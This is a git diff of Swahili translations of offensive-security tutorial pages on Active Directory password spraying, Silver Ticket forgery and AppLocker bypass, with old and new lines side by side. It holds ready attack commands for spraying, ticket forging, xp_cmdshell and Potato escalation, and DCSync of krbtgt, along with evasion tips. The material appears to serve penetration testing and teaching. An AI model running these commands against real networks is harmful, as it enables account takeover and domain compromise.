```
- [**spray**](https://github.com/Greenwolf/Spray) _**(unaweza kubainisha idadi ya jaribio ili kuepuka kufungiwa):**_
- [**spray**](https://github.com/Greenwolf/Spray) _**(unaweza kuonyesha idadi ya majaribio ili kuepuka kufungiwa):**_
```bash
spray.sh -smb <targetIP> <usernameList> <passwordList> <AttemptsPerLockoutPeriod> <LockoutPeriodInMinutes> <DOMAIN>
```
- Kutumia [**kerbrute**](https://github.com/TarlogicSecurity/kerbrute) (python) - HAIPENDEKEZWI; WAKATI MWINGINE HAIFANYI KAZI
- Kutumia [**kerbrute**](https://github.com/TarlogicSecurity/kerbrute) (python) - HAIPENDEKEZWI, WAKATI MINGINE HAIFANYI KAZI
```bash
python kerbrute.py -domain jurassic.park -users users.txt -passwords passwords.txt -outputfile jurassic_passwords.txt
python kerbrute.py -domain jurassic.park -users users.txt -password Password123 -outputfile jurassic_passwords.txt
```
- Kwa moduli ya `scanner/smb/smb_login` ya **Metasploit**:
- Kwa kutumia module ya `scanner/smb/smb_login` ya **Metasploit**:
![](<../../images/image (745).png>)
- Kutumia **rpcclient**:
- Kwa kutumia **rpcclient**:
```bash
# https://www.blackhillsinfosec.com/password-spraying-other-fun-with-rpcclient/
for u in $(cat users.txt); do
rpcclient -U "$u%Welcome1" -c "getusername;quit" 10.10.10.10 | grep Authority;
done
```
#### Kutoka kwa Windows
#### Kutoka Windows
- Kwa [Rubeus](https://github.com/Zer1t0/Rubeus) version with brute module:
- Kwa [Rubeus](https://github.com/Zer1t0/Rubeus) toleo lenye brute module:
```bash
# with a list of users
.\Rubeus.exe brute /users:<users_file> /passwords:<passwords_file> /domain:<domain_name> /outfile:<output_file>
@ -77,19 +77,19 @@ done
# check passwords for all users in current domain
.\Rubeus.exe brute /passwords:<passwords_file> /outfile:<output_file>
```
- Kwa [**Invoke-DomainPasswordSpray**](https://github.com/dafthack/DomainPasswordSpray/blob/master/DomainPasswordSpray.ps1) (Inaweza kuunda watumiaji kutoka kwenye domain kwa chaguo-msingi na itapata sera ya nywila kutoka kwenye domain na itaweka kikomo kwa idadi ya majaribio kulingana nayo):
- Kwa kutumia [**Invoke-DomainPasswordSpray**](https://github.com/dafthack/DomainPasswordSpray/blob/master/DomainPasswordSpray.ps1) (Inaweza kuzalisha watumiaji kutoka kwenye domain kwa chaguo-msingi na itapata sera ya nywila kutoka kwenye domain na kupunguza majaribio kulingana nayo):
```bash
Invoke-DomainPasswordSpray -UserList .\users.txt -Password 123456 -Verbose
```
- Kwa [**Invoke-SprayEmptyPassword.ps1**](https://github.com/S3cur3Th1sSh1t/Creds/blob/master/PowershellScripts/Invoke-SprayEmptyPassword.ps1)
- Kwa kutumia [**Invoke-SprayEmptyPassword.ps1**](https://github.com/S3cur3Th1sSh1t/Creds/blob/master/PowershellScripts/Invoke-SprayEmptyPassword.ps1)
```
Invoke-SprayEmptyPassword
```
### Tambua na Uchukue Udhibiti wa Akaunti "Password must change at next logon" (SAMR)
### Tambua na Uchukue Udhibiti wa Akaunti "Nywila lazima ibadilishwe wakati wa kuingia ufuatao" (SAMR)
Mbinu ya kimyakimya ni spray password isiyo hatari/tupu na kushika akaunti zinazorudisha STATUS_PASSWORD_MUST_CHANGE, ambayo inaonyesha kuwa password iliexpire kwa nguvu na inaweza kubadilishwa bila kujua ile ya zamani.
Mbinu yenye kelele ndogo ni kufanya spray password isiyo hatari/tupu na kugundua akaunti zinazorejesha STATUS_PASSWORD_MUST_CHANGE, ambayo inaonyesha kuwa password ilitimizwa kwa nguvu na inaweza kubadilishwa bila kujua password ya zamani.
Mchakato:
Workflow:
- Orodhesha watumiaji (RID brute via SAMR) ili kujenga orodha ya malengo:
{{#ref}}
@ -99,12 +99,12 @@ Mchakato:
# NetExec (null/guest) + RID brute to harvest users
netexec smb <dc_fqdn> -u '' -p '' --rid-brute | awk -F'\\\\| ' '/SidTypeUser/ {print $3}' > users.txt
```
- Spray password tupu na endelea kwenye hits ili kunyakua accounts ambazo zinapaswa kubadilishwa wakati wa next logon:
- Spray password tupu na endelea kwenye hits ili kunasa akaunti ambazo zinatakiwa kubadilisha password zao wakati wa next logon:
```bash
# Will show valid, lockout, and STATUS_PASSWORD_MUST_CHANGE among results
netexec smb <DC.FQDN> -u users.txt -p '' --continue-on-success
```
- Kwa kila hit, badilisha password kupitia SAMR kwa module ya NetExec (hakuna old password inahitajika wakati "must change" imewekwa):
- Kwa kila hit, badilisha password kupitia SAMR kwa kutumia NetExecs module (hakuna old password inahitajika wakati "must change" imewekwa):
```bash
# Strong complexity to satisfy policy
env NEWPASS='P@ssw0rd!2025#' ; \
@ -113,21 +113,21 @@ netexec smb <DC.FQDN> -u <User> -p '' -M change-password -o NEWPASS="$NEWPASS"
# Validate and retrieve domain password policy with the new creds
netexec smb <DC.FQDN> -u <User> -p "$NEWPASS" --pass-pol
```
Vidokezo vya operesheni:
- Hakikisha saa ya host yako iko sawa na saa ya DC kabla ya operesheni zinazotegemea Kerberos: `sudo ntpdate <dc_fqdn>`.
- [+] bila (Pwn3d!) katika baadhi ya modules (kwa mfano, RDP/WinRM) ina maana creds ni sahihi lakini akaunti haina interactive logon rights.
Vidokezo vya uendeshaji:
- Hakikisha saa ya mwenyeji wako iko sawa na ile ya DC kabla ya Kerberos-based operations: `sudo ntpdate <dc_fqdn>`.
- [+] bila (Pwn3d!) katika baadhi ya moduli (kwa mfano, RDP/WinRM) inamaanisha creds ni halali lakini akaunti haina interactive logon rights.
## Brute Force
```bash
legba kerberos --target 127.0.0.1 --username admin --password wordlists/passwords.txt --kerberos-realm example.org
```
### Kerberos pre-auth spraying na LDAP targeting na PSO-aware throttling (SpearSpray)
### Kerberos pre-auth spraying with LDAP targeting and PSO-aware throttling (SpearSpray)
Kerberos pre-authbased spraying inapunguza kelele ikilinganishwa na SMB/NTLM/LDAP bind attempts na inaendana vizuri zaidi na AD lockout policies. SpearSpray inaunganisha LDAP-driven targeting, injini ya pattern, na uelewa wa sera (domain policy + PSOs + badPwdCount buffer) ili kuspray kwa usahihi na kwa usalama. Inaweza pia ku-tag compromised principals katika Neo4j kwa BloodHound pathing.
Kerberos pre-authbased spraying inapunguza kelele ikilinganishwa na SMB/NTLM/LDAP bind attempts na inaleta ulinganifu mzuri zaidi na AD lockout policies. SpearSpray inaunganisha LDAP-driven targeting, pattern engine, na ufahamu wa sera (domain policy + PSOs + badPwdCount buffer) kufanya spraying kwa usahihi na kwa usalama. Pia inaweza ku-tag principals zilizodukuliwa katika Neo4j kwa BloodHound pathing.
Mawazo muhimu:
Key ideas:
- LDAP user discovery with paging and LDAPS support, optionally using custom LDAP filters.
- Domain lockout policy + PSO-aware filtering ili kuacha buffer ya jaribio inayoweza kusanidiwa (kizingiti) na kuepuka kufunga watumiaji.
- Domain lockout policy + PSO-aware filtering ili kuacha buffer ya majaribio inayoweza kusanidiwa (threshold) na kuepuka kufunga watumiaji.
- Kerberos pre-auth validation using fast gssapi bindings (generates 4768/4771 on DCs instead of 4625).
- Pattern-based, per-user password generation using variables like names and temporal values derived from each users pwdLastSet.
- Throughput control with threads, jitter, and max requests per second.
@ -153,7 +153,7 @@ spearspray -u pentester -p Password123 -d fabrikam.local -dc dc01.fabrikam.local
# Use separators/suffixes and an org token consumed by patterns via {separator}/{suffix}/{extra}
spearspray -u pentester -p Password123 -d fabrikam.local -dc dc01.fabrikam.local -sep @-_ -suf !? -x ACME
```
Vidhibiti vya kujificha na usalama:
Vidhibiti vya usiri na usalama:
```bash
# Control concurrency, add jitter, and cap request rate
spearspray -u pentester -p Password123 -d fabrikam.local -dc dc01.fabrikam.local -t 5 -j 3,5 --max-rps 10
@ -161,11 +161,11 @@ spearspray -u pentester -p Password123 -d fabrikam.local -dc dc01.fabrikam.local
# Leave N attempts in reserve before lockout (default threshold: 2)
spearspray -u pentester -p Password123 -d fabrikam.local -dc dc01.fabrikam.local -thr 2
```
Neo4j/BloodHound uboreshaji wa data:
Uboreshaji wa Neo4j/BloodHound:
```bash
spearspray -u pentester -p Password123 -d fabrikam.local -dc dc01.fabrikam.local -nu neo4j -np bloodhound --uri bolt://localhost:7687
```
Muhtasari wa mfumo wa pattern (patterns.txt):
Muhtasari wa mfumo wa patterns (patterns.txt):
```text
# Example templates consuming per-user attributes and temporal context
{name}{separator}{year}{suffix}
@ -176,27 +176,27 @@ Muhtasari wa mfumo wa pattern (patterns.txt):
```
Available variables include:
- {name}, {samaccountname}
- Temporal from each users pwdLastSet (or whenCreated): {year}, {short_year}, {month_number}, {month_en}, {season_en}
- Composition helpers and org token: {separator}, {suffix}, {extra}
- Muda kutoka kwa pwdLastSet ya kila mtumiaji (au whenCreated): {year}, {short_year}, {month_number}, {month_en}, {season_en}
- Vifaa vya muundo na tokeni ya shirika: {separator}, {suffix}, {extra}
Operational notes:
- Pendelea kuuliza PDC-emulator kwa -dc ili kusoma badPwdCount yenye uhalali zaidi na taarifa zinazohusiana na sera.
- Urejeshaji wa badPwdCount unasababishwa kwenye jaribio lijalo baada ya dirisha la uchunguzi; tumia threshold na timing ili kuwa salama.
- Majaribio ya Kerberos pre-auth yanaonekana kama 4768/4771 katika DC telemetry; tumia jitter na rate-limiting ili kujizungusha.
Vidokezo vya uendeshaji:
- Pendelea kuwasilisha maswali kwa PDC-emulator kwa kutumia -dc ili kusoma badPwdCount na taarifa za sera zinazoaminika zaidi.
- Urejeshaji wa badPwdCount unaanzishwa kwenye jaribio linalofuata baada ya dirisha la uchunguzi; tumia kizingiti na upangaji wa wakati ili kuwa salama.
- Majaribio ya Kerberos pre-auth yanaonekana kama 4768/4771 katika DC telemetry; tumia jitter na rate-limiting ili kuendana na trafiki ya kawaida.
> Kidokezo: SpearSprays default LDAP page size is 200; rekebisha na -lps inapohitajika.
> Kidokezo: Saizi ya ukurasa wa LDAP inayotumika kwa SpearSpray ni 200; rekebisha kwa -lps inapohitajika.
## Outlook Web Access
There are multiples tools for p**assword spraying outlook**.
Kuna zana nyingi za p**assword spraying outlook**.
- Kwa kutumia [MSF Owa_login](https://www.rapid7.com/db/modules/auxiliary/scanner/http/owa_login/)
- Kwa kutumia [MSF Owa_ews_login](https://www.rapid7.com/db/modules/auxiliary/scanner/http/owa_ews_login/)
- Kwa kutumia [Ruler](https://github.com/sensepost/ruler) (inayotegemewa!)
- Kwa kutumia [DomainPasswordSpray](https://github.com/dafthack/DomainPasswordSpray) (Powershell)
- Kwa kutumia [MailSniper](https://github.com/dafthack/MailSniper) (Powershell)
- Kwa [MSF Owa_login](https://www.rapid7.com/db/modules/auxiliary/scanner/http/owa_login/)
- Kwa [MSF Owa_ews_login](https://www.rapid7.com/db/modules/auxiliary/scanner/http/owa_ews_login/)
- Kwa [Ruler](https://github.com/sensepost/ruler) (inayotegemewa!)
- Kwa [DomainPasswordSpray](https://github.com/dafthack/DomainPasswordSpray) (Powershell)
- Kwa [MailSniper](https://github.com/dafthack/MailSniper) (Powershell)
Ili kutumia yoyote ya zana hizi, unahitaji orodha ya watumiaji na password / orodha ndogo ya passwords za spray.
Ili kutumia zana yoyote kati ya hizi, unahitaji orodha ya watumiaji na password / a small list of passwords to spray.
```bash
./ruler-linux64 --domain reel2.htb -k brute --users users.txt --passwords passwords.txt --delay 0 --verbose
[x] Failed: larsson:Summer2020
@ -215,7 +215,7 @@ Ili kutumia yoyote ya zana hizi, unahitaji orodha ya watumiaji na password / oro
- [https://github.com/Rhynorater/Okta-Password-Sprayer](https://github.com/Rhynorater/Okta-Password-Sprayer)
- [https://github.com/knavesec/CredMaster](https://github.com/knavesec/CredMaster)
## Marejeo
## Marejeleo
- [https://github.com/sikumy/spearspray](https://github.com/sikumy/spearspray)
- [https://github.com/TarlogicSecurity/kerbrute](https://github.com/TarlogicSecurity/kerbrute)

55
src/windows-hardening/active-directory-methodology/silver-ticket.md
View File

@ -6,14 +6,15 @@
## Silver ticket
Shambulio la **Silver Ticket** linahusisha matumizi mabaya ya service tickets katika Active Directory (AD) mazingira. Mbinu hii inategemea **kupata NTLM hash ya service account**, kama account ya kompyuta, ili kutengeneza Ticket Granting Service (TGS) ticket. Kwa ticket hii iliyotengenezwa, mshambuliaji anaweza kupata huduma maalumu kwenye mtandao, **kujifanya mtumiaji yeyote**, kwa kawaida akilenga vibali vya kiutawala. Inasisitizwa kwamba kutumia AES keys kutengeneza tiketi ni salama zaidi na kunagundulika kwa shida.
Shambulio la **Silver Ticket** linahusisha matumizi mabaya ya service tickets katika mazingira ya Active Directory (AD). Njia hii inategemea **kupata NTLM hash ya akaunti ya huduma**, kama vile akaunti ya kompyuta, ili kutengeneza Ticket Granting Service (TGS) ticket. Kwa tiketi hii iliyotengenezwa kwa ulaghai, mshambuliaji anaweza kupata huduma maalum kwenye mtandao, **kuigiza mtumiaji yoyote**, kwa kawaida akilenga vibali vya kiutawala. Inasisitizwa kwamba kutumia AES keys kwa kutengeneza tiketi ni salama zaidi na inayotambulika kwa ukosefu mdogo.
> [!WARNING]
> Silver Tickets zinaonekana kwa ugunduzi mdogo kuliko Golden Tickets kwa sababu zinahitaji tu **hash ya service account**, sio akaunti ya krbtgt. Hata hivyo, zimepungukiwa kwa huduma maalumu wanayolenga. Aidha, ikiwa utaiba nenosiri la akaunti yenye SPN unaweza kutumia nenosiri hilo kuunda Silver Ticket inayojifanya mtumiaji yeyote kwa huduma hiyo.
> Silver Tickets ni ngumu kugunduliwa kuliko Golden Tickets kwa sababu zinahitaji tu **hash ya akaunti ya huduma**, si akaunti ya krbtgt. Hata hivyo, zina kikomo kwa huduma maalum wanayolenga. Pia, hata kuiba tu nenosiri la mtumiaji kunaweza kutosha.
> Zaidi ya hayo, ikiwa utapora **nenosiri la akaunti lenye SPN** unaweza kutumia nenosiri hilo kutengeneza Silver Ticket inayomfanya mtu awe mtumiaji yoyote kwa huduma hiyo.
Kwa utengenezaji wa tiketi, zana tofauti zinatumiwa kulingana na mfumo wa uendeshaji:
Kwa kutengeneza tiketi, zana mbalimbali zinatumika kulingana na mfumo wa uendeshaji:
### Kwenye Linux
### On Linux
```bash
python ticketer.py -nthash <HASH> -domain-sid <DOMAIN_SID> -domain <DOMAIN> -spn <SERVICE_PRINCIPAL_NAME> <USER>
export KRB5CCNAME=/root/impacket-examples/<TICKET_NAME>.ccache
@ -36,11 +37,11 @@ mimikatz.exe "kerberos::ptt <TICKET_FILE>"
# Obtain a shell
.\PsExec.exe -accepteula \\<TARGET> cmd
```
Huduma ya CIFS imeonyeshwa kama lengo la kawaida la kupata mfumo wa faili wa mwathiriwa, lakini huduma nyingine kama HOST na RPCSS pia zinaweza kutumika kwa ajili ya kazi na maombi ya WMI.
Huduma ya CIFS imeangaziwa kama lengo la kawaida la kupata mfumo wa faili wa mwathiriwa, lakini huduma nyingine kama HOST na RPCSS pia zinaweza kutumiwa kwa ajili ya kazi na maswali ya WMI.
### Example: MSSQL service (MSSQLSvc) + Potato to SYSTEM
### Mfano: huduma ya MSSQL (MSSQLSvc) + Potato hadi SYSTEM
Kama una hash ya NTLM (au ufunguo wa AES) wa akaunti ya huduma ya SQL (kwa mfano, sqlsvc) unaweza kutengeneza TGS kwa MSSQL SPN na kujifanya mtumiaji yeyote kwa huduma ya SQL. Kutoka hapo, wezesha xp_cmdshell ili kutekeleza amri kama akaunti ya huduma ya SQL. Ikiwa token hiyo ina SeImpersonatePrivilege, unganisha Potato ili kupandisha hadhi hadi SYSTEM.
Ikiwa una hash ya NTLM (au ufunguo wa AES) wa akaunti ya huduma ya SQL (mfano, sqlsvc), unaweza kutengeneza TGS kwa MSSQL SPN na kuiga mtumiaji yeyote kwa huduma ya SQL. Kutoka hapo, wezesha xp_cmdshell ili kutekeleza amri kama akaunti ya huduma ya SQL. Ikiwa token hiyo ina SeImpersonatePrivilege, fanya mnyororo wa Potato ili kuinua cheo hadi SYSTEM.
```bash
# Forge a silver ticket for MSSQLSvc (RC4/NTLM example)
python ticketer.py -nthash <SQLSVC_RC4> -domain-sid <DOMAIN_SID> -domain <DOMAIN> \
@ -51,14 +52,14 @@ export KRB5CCNAME=$PWD/administrator.ccache
impacket-mssqlclient -k -no-pass <DOMAIN>/administrator@<host.fqdn>:1433 \
-q "EXEC sp_configure 'show advanced options',1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell',1;RECONFIGURE;EXEC xp_cmdshell 'whoami'"
```
- Ikiwa muktadha unaopatikana una SeImpersonatePrivilege (mara nyingi ni kweli kwa akaunti za huduma), tumia toleo la Potato kupata SYSTEM:
- Ikiwa muktadha uliopatikana una SeImpersonatePrivilege (mara nyingi kweli kwa service accounts), tumia Potato variant ili kupata SYSTEM:
```bash
# On the target host (via xp_cmdshell or interactive), run e.g. PrintSpoofer/GodPotato
PrintSpoofer.exe -c "cmd /c whoami"
# or
GodPotato -cmd "cmd /c whoami"
```
Maelezo zaidi kuhusu kutumia vibaya MSSQL na kuwezesha xp_cmdshell:
Maelezo zaidi kuhusu kutumia MSSQL na kuwezesha xp_cmdshell:
{{#ref}}
abusing-ad-mssql.md
@ -72,14 +73,14 @@ Muhtasari wa mbinu za Potato:
## Huduma Zinazopatikana
| Service Type | Service Silver Tickets |
| Aina ya Huduma | Service Silver Tickets |
| ------------------------------------------ | -------------------------------------------------------------------------- |
| WMI | <p>HOST</p><p>RPCSS</p> |
| PowerShell Remoting | <p>HOST</p><p>HTTP</p><p>Kulingana na OS pia:</p><p>WSMAN</p><p>RPCSS</p> |
| WinRM | <p>HOST</p><p>HTTP</p><p>Katika baadhi ya matukio unaweza kuomba tu: WINRM</p> |
| PowerShell Remoting | <p>HOST</p><p>HTTP</p><p>Kulingana na OS pia:</p><p>WSMAN</p><p>RPCSS</p> |
| WinRM | <p>HOST</p><p>HTTP</p><p>Kwa baadhi ya wakati unaweza kuomba tu: WINRM</p> |
| Scheduled Tasks | HOST |
| Windows File Share, also psexec | CIFS |
| LDAP operations, included DCSync | <p>LDAP</p><p>ikiwa ni pamoja na DCSync</p> |
| LDAP operations, included DCSync | LDAP |
| Windows Remote Server Administration Tools | <p>RPCSS</p><p>LDAP</p><p>CIFS</p> |
| Golden Tickets | krbtgt |
@ -87,23 +88,23 @@ Using **Rubeus** you may **ask for all** these tickets using the parameter:
- `/altservice:host,RPCSS,http,wsman,cifs,ldap,krbtgt,winrm`
### Vitambulisho vya Matukio vya Silver Tickets
### Silver tickets Vitambulisho vya Tukio
- 4624: Kuingia kwa Akaunti
- 4634: Kuondoka/Kutoka kwa Akaunti
- 4634: Kutoka kwa Akaunti
- 4672: Kuingia kwa Admin
## Uendelevu
Ili kuzuia mashine zisibadilishe nywila kila baada ya siku 30 weka `HKLM\SYSTEM\CurrentControlSet\Services\Netlogon\Parameters\DisablePasswordChange = 1` au unaweza kuweka `HKLM\SYSTEM\CurrentControlSet\Services\NetLogon\Parameters\MaximumPasswordAge` kwa thamani kubwa kuliko siku 30 kuonyesha kipindi cha mzunguko ambacho nywila ya mashine inapaswa kubadilishwa.
Ili kuzuia mashine zizungushe nywila zao kila 30 days weka `HKLM\SYSTEM\CurrentControlSet\Services\Netlogon\Parameters\DisablePasswordChange = 1` au unaweza kuweka `HKLM\SYSTEM\CurrentControlSet\Services\NetLogon\Parameters\MaximumPasswordAge` kuwa thamani kubwa kuliko 30days ili kuonyesha kipindi cha mzunguko ambapo nywila ya mashine inapaswa kugeuzwa.
## Abusing Service tickets
## Kutumia tikiti za huduma
Katika mifano iliyofuata tufikirie tiketi imepatikana kwa kuigiza akaunti ya administrator.
Katika mifano ifuatayo hebu tufikirie kuwa tikiti imetolewa kwa kuiga akaunti ya msimamizi.
### CIFS
Kwa tiketi hii utaweza kufikia folda za `C$` na `ADMIN$` kupitia **SMB** (ikiwa zime wazi) na kunakili mafaili kwenye sehemu ya mfumo wa faili wa mbali kwa kufanya kitu kama:
Ukitumia tikiti hii utaweza kupata ufikivu kwenye folda `C$` na `ADMIN$` kupitia **SMB** (ikiwa zimefunuliwa) na kunakili faili kwenye sehemu ya mfumo wa faili ya mbali kwa kufanya kitu kama:
```bash
dir \\vulnerable.computer\C$
dir \\vulnerable.computer\ADMIN$
@ -117,7 +118,7 @@ Pia utaweza kupata shell ndani ya host au kutekeleza amri zozote kwa kutumia **p
### HOST
Kwa ruhusa hii unaweza kuunda kazi zilizopangwa kwenye kompyuta za mbali na kutekeleza amri zozote:
Kwa ruhusa hii unaweza kuunda scheduled tasks kwenye remote computers na execute arbitrary commands:
```bash
#Check you have permissions to use schtasks over a remote server
schtasks /S some.vuln.pc
@ -131,7 +132,7 @@ schtasks /Run /S mcorp-dc.moneycorp.local /TN "SomeTaskName"
```
### HOST + RPCSS
Kwa tikiti hizi unaweza **kutekeleza WMI kwenye mfumo wa mwathiriwa**:
Kwa tiketi hizi unaweza **kutekeleza WMI katika mfumo wa mwathiri**:
```bash
#Check you have enough privileges
Invoke-WmiMethod -class win32_operatingsystem -ComputerName remote.computer.local
@ -150,11 +151,11 @@ Pata **maelezo zaidi kuhusu wmiexec** kwenye ukurasa ufuatao:
### HOST + WSMAN (WINRM)
Ikiwa una ufikiaji wa winrm kwenye kompyuta unaweza **kuifikia** na hata kupata PowerShell:
Kwa ufikiaji wa winrm kwenye kompyuta unaweza **kuifikia** na hata kupata PowerShell:
```bash
New-PSSession -Name PSC -ComputerName the.computer.name; Enter-PSSession PSC
```
Check the following page to learn **njia zaidi za kuunganishwa na mwenyeji wa mbali ukitumia winrm**:
Angalia ukurasa ufuatao ili kujifunza **njia zaidi za kuunganisha na mwenyeji wa mbali kutumia winrm**:
{{#ref}}
@ -162,15 +163,15 @@ Check the following page to learn **njia zaidi za kuunganishwa na mwenyeji wa mb
{{#endref}}
> [!WARNING]
> Kumbuka kwamba **winrm lazima iwe imewezeshwa na ikisikiliza** kwenye kompyuta ya mbali ili kuifikia.
> Kumbuka kwamba **winrm lazima iwe hai na ikisikiliza** kwenye kompyuta ya mbali ili kuifikia.
### LDAP
Kwa ruhusa hii unaweza dump DC database ukitumia **DCSync**:
Kwa ruhusa hii unaweza dump hifadhidata ya DC ukitumia **DCSync**:
```
mimikatz(commandline) # lsadump::dcsync /dc:pcdc.domain.local /domain:domain.local /user:krbtgt
```
**Jifunze zaidi kuhusu DCSync** katika ukurasa ufuatao:
**Jifunze zaidi kuhusu DCSync** kwenye ukurasa ufuatao:
{{#ref}}
@ -178,7 +179,7 @@ dcsync.md
{{#endref}}
## Marejeo
## Marejeleo
- [https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/kerberos-silver-tickets](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/kerberos-silver-tickets)
- [https://www.tarlogic.com/blog/how-to-attack-kerberos/](https://www.tarlogic.com/blog/how-to-attack-kerberos/)

162
src/windows-hardening/authentication-credentials-uac-and-efs/README.md
View File

@ -4,14 +4,14 @@
## Sera ya AppLocker
Orodha nyeupe ya programu ni orodha ya programu za programu zilizokubaliwa au faili za utekelezaji zinazoruhusiwa kuwepo na kuendeshwa kwenye mfumo. Lengo ni kulinda mazingira dhidi ya malware hatari na programu zisizoruhusiwa ambazo hazilingani na mahitaji maalum ya biashara ya shirika.
Orodha nyeupe ya programu ni orodha ya programu zilizoidhinishwa au faili zinazotekelezwa ambazo zinaruhusiwa kuwepo na kuendeshwa kwenye mfumo. Lengo ni kulinda mazingira dhidi ya malware yenye madhara na programu zisizoidhinishwa ambazo hazilingani na mahitaji maalum ya biashara ya shirika.
[AppLocker](https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/applocker/what-is-applocker) ni suluhisho la Microsoft la **orodha nyeupe ya programu** na huwapa wasimamizi wa mfumo udhibiti juu ya **programu na faili ambazo watumiaji wanaweza kuendesha**. Inatoa **udhibiti wa kina** juu ya executables, scripts, Windows installer files, DLLs, packaged apps, na packed app installers.\
Ni kawaida kwa mashirika **kuzuia cmd.exe na PowerShell.exe** na upatikanaji wa kuandika kwa saraka fulani, **lakini yote haya yanaweza kuepukika**.
[AppLocker](https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/applocker/what-is-applocker) ni suluhisho la Microsoft la **application whitelisting** na huwapa wasimamizi wa mfumo udhibiti juu ya **ni programu na faili gani watumiaji wanaweza kuendesha**. Inatoa **udhibiti wa undani** juu ya executables, scripts, Windows installer files, DLLs, packaged apps, and packed app installers.\
Ni kawaida kwa mashirika **kuzuia cmd.exe na PowerShell.exe** na upatikanaji wa kuandika kwenye saraka fulani, **lakini yote haya yanaweza kuzungukwa**.
### Angalia
Angalia ni faili/viendelezi gani vimeorodheshwa kwenye orodha nyeusi au orodha nyeupe:
Angalia ni faili/upanuisaji gani ziko kwenye orodha nyeusi/nyeyeupe:
```bash
Get-ApplockerPolicy -Effective -xml
@ -20,60 +20,60 @@ Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections
$a = Get-ApplockerPolicy -effective
$a.rulecollections
```
Njia hii ya rejista ina usanidi na sera zinazotumika na AppLocker, ikitoa njia ya kupitia seti ya sasa ya sheria zinazotekelezwa kwenye mfumo:
Njia hii ya rejista ina mipangilio na sera zinazotumika na AppLocker, ikitoa njia ya kupitia seti ya sasa ya kanuni zinazotekelezwa kwenye mfumo:
- `HKLM\Software\Policies\Microsoft\Windows\SrpV2`
### Bypass
- Zinazofaa **Writable folders** za ku-bypass AppLocker Policy: Ikiwa AppLocker inaruhusu kutekeleza chochote ndani ya `C:\Windows\System32` au `C:\Windows`, kuna **writable folders** ambazo unaweza kutumia ili **bypass this**.
- Folda muhimu **zinazoweza kuandikwa** za bypass sera ya AppLocker: Ikiwa AppLocker inaruhusu kuendesha chochote ndani ya `C:\Windows\System32` au `C:\Windows` kuna **folda zinazoweza kuandikwa** unaweza kutumia ili **bypass this**.
```
C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys
C:\Windows\System32\spool\drivers\color
C:\Windows\Tasks
C:\windows\tracing
```
- Kwa kawaida mafaili ya **zinazoaminika** [**"LOLBAS's"**](https://lolbas-project.github.io/) binaries pia yanaweza kusaidia kupitisha AppLocker.
- **Sheria zilizotengenezwa vibaya pia zinaweza kupitishwa**
- Kwa mfano, **`<FilePathCondition Path="%OSDRIVE%*\allowed*"/>`**, unaweza kuunda **folda iitwayo `allowed`** mahali popote na itaruhusiwa.
- Mashirika pia mara nyingi hujikita katika **kuzuia `%System32%\WindowsPowerShell\v1.0\powershell.exe` executable**, lakini husahau kuhusu **mengine** [**PowerShell executable locations**](https://www.powershelladmin.com/wiki/PowerShell_Executables_File_System_Locations) kama `%SystemRoot%\SysWOW64\WindowsPowerShell\v1.0\powershell.exe` au `PowerShell_ISE.exe`.
- **DLL enforcement mara chache huwa imewezeshwa** kutokana na mzigo wa ziada inaweza kuweka kwenye mfumo, na wingi wa upimaji unaohitajika kuhakikisha hakuna kitu kitakachovunjika. Kwa hivyo kutumia **DLLs as backdoors** kutasaidia kupitisha AppLocker.
- Unaweza kutumia [**ReflectivePick**](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick) au [**SharpPick**](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick) kutekeleza **Powershell** code katika mchakato wowote na kupitisha AppLocker. Kwa taarifa zaidi angalia: [https://hunter2.gitbook.io/darthsidious/defense-evasion/bypassing-applocker-and-powershell-constrained-language-mode](https://hunter2.gitbook.io/darthsidious/defense-evasion/bypassing-applocker-and-powershell-constrained-language-mode).
- Mara nyingi **zinaaminika** [**"LOLBAS's"**](https://lolbas-project.github.io/) binaries zinaweza pia kuwa muhimu kupita AppLocker.
- **Kanuni zilizotungwa vibaya pia zinaweza kupitishwa**
- Kwa mfano, **`<FilePathCondition Path="%OSDRIVE%*\allowed*"/>`**, unaweza kuunda **kabrasha liitwalo `allowed`** mahali popote na litaruhusiwa.
- Mashirika pia mara nyingi hufanya mkazo wa **kuzuia the `%System32%\WindowsPowerShell\v1.0\powershell.exe` executable**, lakini husahau kuhusu **other** [**PowerShell executable locations**](https://www.powershelladmin.com/wiki/PowerShell_Executables_File_System_Locations) kama `%SystemRoot%\SysWOW64\WindowsPowerShell\v1.0\powershell.exe` au `PowerShell_ISE.exe`.
- **DLL enforcement haizinduliwa mara chache sana** kutokana na mzigo wa ziada inaweza kuweka kwenye mfumo, na kiwango cha majaribio kinachohitajika kuhakikisha hakitavunjika kitu. Kwa hivyo kutumia **DLLs kama backdoors kuta kusaidia kupita AppLocker**.
- Unaweza kutumia [**ReflectivePick**](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick) au [**SharpPick**](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick) kuendesha **Powershell** code katika mchakato wowote na kupita AppLocker. Kwa maelezo zaidi angalia: [https://hunter2.gitbook.io/darthsidious/defense-evasion/bypassing-applocker-and-powershell-constrained-language-mode](https://hunter2.gitbook.io/darthsidious/defense-evasion/bypassing-applocker-and-powershell-constrained-language-mode).
## Credentials Storage
### Security Accounts Manager (SAM)
Taarifa za kuingia za eneo zipo katika faili hii; nywila zimehashiwa.
Local credentials zipo katika faili hii, nywila zimehashiwa.
### Local Security Authority (LSA) - LSASS
Taarifa za kuingia (zilizo hashed) zimeshifadhiwa katika kumbukumbu ya subsistemu hii kwa sababu za Single Sign-On.\
**LSA** inaendesha sera za **usalama wa eneo** (sera za nywila, ruhusa za watumiaji...), **authentication**, **access tokens**...\
LSA ndicho kitakachokagua cheti zilizotolewa ndani ya faili ya **SAM** (kwa kuingia kwa eneo) na kuzungumza na **domain controller** kuthibitisha mtumiaji wa domain.
The **credentials** (hashed) zinaletwa **hifadhiwa** katika **memory** ya subsystem hii kwa sababu za Single Sign-On.\
**LSA** inadhibiti **security policy** ya eneo (sera za nywila, ruhusa za watumiaji...), **authentication**, **access tokens**...\
